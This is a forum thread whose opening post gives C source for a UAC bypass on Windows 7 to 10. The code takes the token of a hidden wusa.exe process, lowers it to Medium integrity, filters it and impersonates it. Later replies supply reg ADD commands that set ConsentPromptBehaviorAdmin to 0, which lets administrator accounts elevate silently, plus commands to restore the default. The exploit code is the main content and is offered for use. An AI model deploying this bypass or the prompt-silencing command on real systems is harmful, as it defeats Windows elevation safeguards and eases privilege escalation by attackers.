UAC bypass implementation
This is an implementation of a UAC bypass method (credited to the CIA and James Forshaw).
It is reported to work from Windows 7 up to the Windows 10 Fall Creators Update. Note that the listing is not self-contained: the pipe handles inRead/inWrite/outRead/outWrite and the NtSetInformationToken/RtlLengthSid/NtFilterToken function-pointer typedefs are defined elsewhere in the author's project. Code:
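/*
 * StepOverUAC - obtain a medium-integrity, filtered copy of the token of a
 * hidden wusa.exe instance and impersonate it on the calling thread.
 *
 * What the code does, in order:
 *   1. creates two inheritable anonymous pipes into the file-scope globals
 *      inRead/inWrite and outRead/outWrite (they are owned by the caller and
 *      are deliberately left open on both the success and the failure path);
 *   2. launches wusa.exe hidden via ShellExecuteEx, opens its primary token
 *      with MAXIMUM_ALLOWED, then terminates the process and waits for it;
 *   3. duplicates that token as a primary token, sets its integrity label to
 *      Medium with NtSetInformationToken and filters it with NtFilterToken;
 *   4. impersonates the filtered token with ImpersonateLoggedOnUser.
 *
 * Returns 1 on success (the calling thread is now impersonating the filtered
 * token) and 0 on any failure. The previous version fell off the end of the
 * function without a return statement (undefined behaviour for a non-void
 * function whose result is used), called the three ntdll function pointers
 * without checking GetProcAddress, ignored the NtFilterToken result and
 * leaked every token, process and SID handle it acquired; all of that is
 * fixed here. The call sequence and the values passed are unchanged.
 *
 * NOTE(review): why a token taken from wusa.exe and lowered to Medium is
 * useful is not something the code itself explains; see the thread text.
 */
int StepOverUAC()
{
    /* flag passed to NtFilterToken; 0x4 matches LUA_TOKEN in the
     * CreateRestrictedToken flag set (DISABLE_MAX_PRIVILEGE is 0x1) */
    enum { FILTER_FLAG_LUA_TOKEN = 0x4 };

    int ok = 0;
    HANDLE hProcessToken = NULL, hNewToken = NULL, filterToken = NULL;
    PSID pIntegritySid = NULL;
    SECURITY_ATTRIBUTES sa;
    SHELLEXECUTEINFO shinfo;
    SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
    TOKEN_MANDATORY_LABEL tml;
    NTSTATUS Status;
    HMODULE hNtdll;
    NtSetInformationToken pNtSetInformationToken;
    NtFilterToken pNtFilterToken;

    /* Inheritable pipe handles: any child later spawned with handle
     * inheritance enabled will receive them. The globals are consumed
     * elsewhere, so they are not closed here. */
    sa.nLength = sizeof(SECURITY_ATTRIBUTES);
    sa.bInheritHandle = TRUE;
    sa.lpSecurityDescriptor = NULL;
    if (!CreatePipe(&inRead, &inWrite, &sa, 0))
        return 0;
    if (!CreatePipe(&outRead, &outWrite, &sa, 0))
        return 0;

    /* ntdll.dll is mapped into every process, so GetModuleHandle is enough
     * and avoids three LoadLibrary reference-count bumps that were never
     * released. Both resolved pointers are checked before they are called. */
    hNtdll = GetModuleHandleA("ntdll.dll");
    if (hNtdll == NULL)
        return 0;
    pNtSetInformationToken = (NtSetInformationToken)GetProcAddress(hNtdll, "NtSetInformationToken");
    pNtFilterToken = (NtFilterToken)GetProcAddress(hNtdll, "NtFilterToken");
    if (pNtSetInformationToken == NULL || pNtFilterToken == NULL)
        return 0;

    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
    shinfo.cbSize = sizeof(shinfo);
    shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;  /* we need hProcess back to open its token */
    shinfo.lpFile = L"wusa.exe";
    shinfo.nShow = SW_HIDE;
    if (!ShellExecuteEx(&shinfo) || shinfo.hProcess == NULL)
        return 0;

    if (!OpenProcessToken(shinfo.hProcess, MAXIMUM_ALLOWED, &hProcessToken))
        goto cleanup;

    /* The process is only needed for its token; kill it and wait so no
     * stray wusa.exe window is left behind. */
    TerminateProcess(shinfo.hProcess, (UINT)-1);
    WaitForSingleObject(shinfo.hProcess, INFINITE);

    if (!DuplicateTokenEx(hProcessToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &hNewToken))
        goto cleanup;

    /* S-1-16-8192: Medium mandatory level */
    if (!AllocateAndInitializeSid(&MLAuthority, 1, SECURITY_MANDATORY_MEDIUM_RID, 0, 0, 0, 0, 0, 0, 0, &pIntegritySid))
        goto cleanup;

    tml.Label.Attributes = SE_GROUP_INTEGRITY;
    tml.Label.Sid = pIntegritySid;
    Status = pNtSetInformationToken(hNewToken, TokenIntegrityLevel, &tml, sizeof(tml));
    if (!NT_SUCCESS(Status))
        goto cleanup;

    /* The original ignored this result and then impersonated whatever was in
     * filterToken, possibly NULL; assumes the NtFilterToken typedef returns
     * NTSTATUS as the native export does. */
    Status = pNtFilterToken(hNewToken, FILTER_FLAG_LUA_TOKEN, NULL, NULL, NULL, &filterToken);
    if (!NT_SUCCESS(Status) || filterToken == NULL)
        goto cleanup;

    if (!ImpersonateLoggedOnUser(filterToken))
        goto cleanup;
    ok = 1;

cleanup:
    /* The thread holds its own reference to the impersonation token once
     * ImpersonateLoggedOnUser succeeds, so every local handle can be
     * released regardless of outcome. */
    if (filterToken != NULL)
        CloseHandle(filterToken);
    if (hNewToken != NULL)
        CloseHandle(hNewToken);
    if (hProcessToken != NULL)
        CloseHandle(hProcessToken);
    if (pIntegritySid != NULL)
        FreeSid(pIntegritySid);
    CloseHandle(shinfo.hProcess);  /* SEE_MASK_NOCLOSEPROCESS makes this ours to close */
    return ok;
}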
See this post in our sister forum for the latest developments in UAC bypasses (updated three days ago):
Windows 10 Redstone 1/2 UAC changes
|
#4
|
|||
|
|||
|
Even on the very latest Windows 10 build?
there is nothing hot about it :P
How can I restore the UAC level to the first or second position with an .exe or a .reg file?
I sometimes telework on Windows installations in other languages, where it is difficult to find the UAC settings and restore them to normal. Thanks!
To silence the UAC prompt for administrators (note: this does not turn UAC off - that is the separate EnableLUA value; ConsentPromptBehaviorAdmin = 0 only makes elevation silent for members of the Administrators group, so any process running under such an account can elevate without any prompt):
Code:
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0
To restore the default behaviour (5 = prompt for consent for non-Windows binaries):
Code:
reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 5
Both commands write under HKLM and therefore need to be run from an elevated prompt themselves.
Last edited by 0xall0c; 03-20-2018 at 15:46. Reason: corrected double slashes, which are not needed when running from cmd
In cmd:
C:\Users\Nicolae>reg ADD / HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0
ERROR: Invalid key name.
Type "REG ADD /?" for usage.
Maybe this instead:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /f
and
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t reg_dword /d 5 /f
What is /f for?
/f forces the write: if the value already exists it is overwritten without prompting for confirmation.